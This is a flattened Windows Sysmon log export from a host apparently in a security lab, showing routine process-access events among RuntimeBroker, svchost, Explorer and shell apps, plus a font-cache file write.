12:02:30.200{266CAFBE-64C4-6064-9B00-00000000AE01}49245900C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D3-6064-B600-00000000AE01}5544C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+15171|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1e1d|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1f63|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+5ff03|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751 10341000x80000000000000006525Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:30.200{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D3-6064-B600-00000000AE01}5544C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+15084|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1e1d|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1f63|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+5ff03|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751 10341000x80000000000000006524Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:30.200{266CAFBE-64C4-6064-9B00-00000000AE01}49245900C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D3-6064-B600-00000000AE01}5544C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+15084|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1e1d|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1f63|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+5ff03|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751 10341000x80000000000000006523Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:30.200{266CAFBE-64C4-6064-9B00-00000000AE01}49245912C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D3-6064-B600-00000000AE01}5544C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+15171|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1e1d|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1f63|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+5ff03|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751 10341000x80000000000000006522Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:30.200{266CAFBE-64C4-6064-9B00-00000000AE01}49245888C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D3-6064-B600-00000000AE01}5544C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169ae|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1535|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16ef|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+a243|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7 10341000x80000000000000006521Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:30.200{266CAFBE-64C4-6064-9B00-00000000AE01}49245912C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D3-6064-B600-00000000AE01}5544C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+15084|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1e1d|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1f63|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+5ff03|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751 10341000x80000000000000006520Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:30.200{266CAFBE-64C4-6064-9B00-00000000AE01}49243696C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+b8fc|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a 10341000x80000000000000006519Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:30.200{266CAFBE-64C4-6064-9B00-00000000AE01}49245888C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D3-6064-B600-00000000AE01}5544C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169ae|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1535|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16ef|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+a243|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7 10341000x80000000000000006518Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:30.200{266CAFBE-64C4-6064-9B00-00000000AE01}49243732C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D3-6064-B600-00000000AE01}5544C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169ae|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1535|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16ef|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+a243|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7 10341000x80000000000000006517Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:30.200{266CAFBE-64C4-6064-9B00-00000000AE01}49243480C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D3-6064-B600-00000000AE01}5544C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169ae|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1535|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16ef|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+a243|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7 10341000x80000000000000006516Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:30.184{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-64D3-6064-B600-00000000AE01}5544C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8b22|c:\windows\system32\lsm.dll+8a76|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006515Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:30.184{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-64D3-6064-B600-00000000AE01}5544C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8a38|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 
10341000x80000000000000006514Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:30.153{266CAFBE-64C4-6064-9B00-00000000AE01}49243696C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+6198|C:\Windows\system32\windows.cortana.onecore.dll+c370|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e 10341000x80000000000000006513Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:30.137{266CAFBE-64C4-6064-9B00-00000000AE01}49243696C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+6198|C:\Windows\system32\windows.cortana.onecore.dll+7e00|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e 10341000x80000000000000006512Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:30.137{266CAFBE-646C-6064-1200-00000000AE01}11961192C:\Windows\system32\svchost.exe{266CAFBE-64D3-6064-B600-00000000AE01}5544C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6c14|c:\windows\system32\fntcache.dll+17acf|c:\windows\system32\fntcache.dll+1a697|c:\windows\system32\fntcache.dll+1aacc|c:\windows\system32\fntcache.dll+5034e|c:\windows\system32\fntcache.dll+50052|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 11241100x80000000000000006511Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:30.137{266CAFBE-646C-6064-1200-00000000AE01}1196C:\Windows\system32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\~FontCache-S-1-5-21-4055678433-3894535204-3898404691-500.dat2021-03-31 12:02:30.137 10341000x80000000000000006510Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:30.137{266CAFBE-646C-6064-1200-00000000AE01}11961192C:\Windows\system32\svchost.exe{266CAFBE-64D3-6064-B600-00000000AE01}5544C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6c14|c:\windows\system32\fntcache.dll+17acf|c:\windows\system32\fntcache.dll+1a697|c:\windows\system32\fntcache.dll+1aacc|c:\windows\system32\fntcache.dll+5034e|c:\windows\system32\fntcache.dll+50052|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006509Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:30.137{266CAFBE-646C-6064-1200-00000000AE01}11961192C:\Windows\system32\svchost.exe{266CAFBE-64D3-6064-B600-00000000AE01}5544C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6c14|c:\windows\system32\fntcache.dll+17acf|c:\windows\system32\fntcache.dll+1a697|c:\windows\system32\fntcache.dll+1aacc|c:\windows\system32\fntcache.dll+5034e|c:\windows\system32\fntcache.dll+50052|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006508Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:30.137{266CAFBE-646C-6064-1200-00000000AE01}11961192C:\Windows\system32\svchost.exe{266CAFBE-64D3-6064-B600-00000000AE01}5544C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6c14|c:\windows\system32\fntcache.dll+17acf|c:\windows\system32\fntcache.dll+1a697|c:\windows\system32\fntcache.dll+1aacc|c:\windows\system32\fntcache.dll+5034e|c:\windows\system32\fntcache.dll+50052|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006507Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:30.137{266CAFBE-646C-6064-1200-00000000AE01}11961192C:\Windows\system32\svchost.exe{266CAFBE-64D3-6064-B600-00000000AE01}5544C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6c14|c:\windows\system32\fntcache.dll+17acf|c:\windows\system32\fntcache.dll+1a697|c:\windows\system32\fntcache.dll+1aacc|c:\windows\system32\fntcache.dll+5034e|c:\windows\system32\fntcache.dll+50052|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006506Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:30.122{266CAFBE-646C-6064-0C00-00000000AE01}5921096C:\Windows\system32\svchost.exe{266CAFBE-64D3-6064-B600-00000000AE01}5544C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+18a6c|C:\Windows\SYSTEM32\psmserviceexthost.dll+e44e|C:\Windows\SYSTEM32\psmserviceexthost.dll+e4e7|C:\Windows\SYSTEM32\psmserviceexthost.dll+e1f2|C:\Windows\SYSTEM32\psmserviceexthost.dll+18e38|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006505Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:30.122{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-64D3-6064-B600-00000000AE01}5544C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+78b1|C:\Windows\SYSTEM32\psmserviceexthost.dll+739b|C:\Windows\SYSTEM32\psmserviceexthost.dll+ae34|C:\Windows\SYSTEM32\psmserviceexthost.dll+7bae|C:\Windows\SYSTEM32\psmserviceexthost.dll+12111|C:\Windows\SYSTEM32\psmserviceexthost.dll+170a8|C:\Windows\SYSTEM32\resourcepolicyserver.dll+12326|C:\Windows\SYSTEM32\resourcepolicyserver.dll+bac5|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006504Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:30.122{266CAFBE-64C5-6064-A500-00000000AE01}43565400C:\Windows\Explorer.EXE{266CAFBE-64D3-6064-B600-00000000AE01}5544C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1ea06|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+ba300|C:\Windows\System32\TwinUI.dll+ba677|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\combase.dll+567e1|C:\Windows\System32\combase.dll+56e0d 10341000x80000000000000006503Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
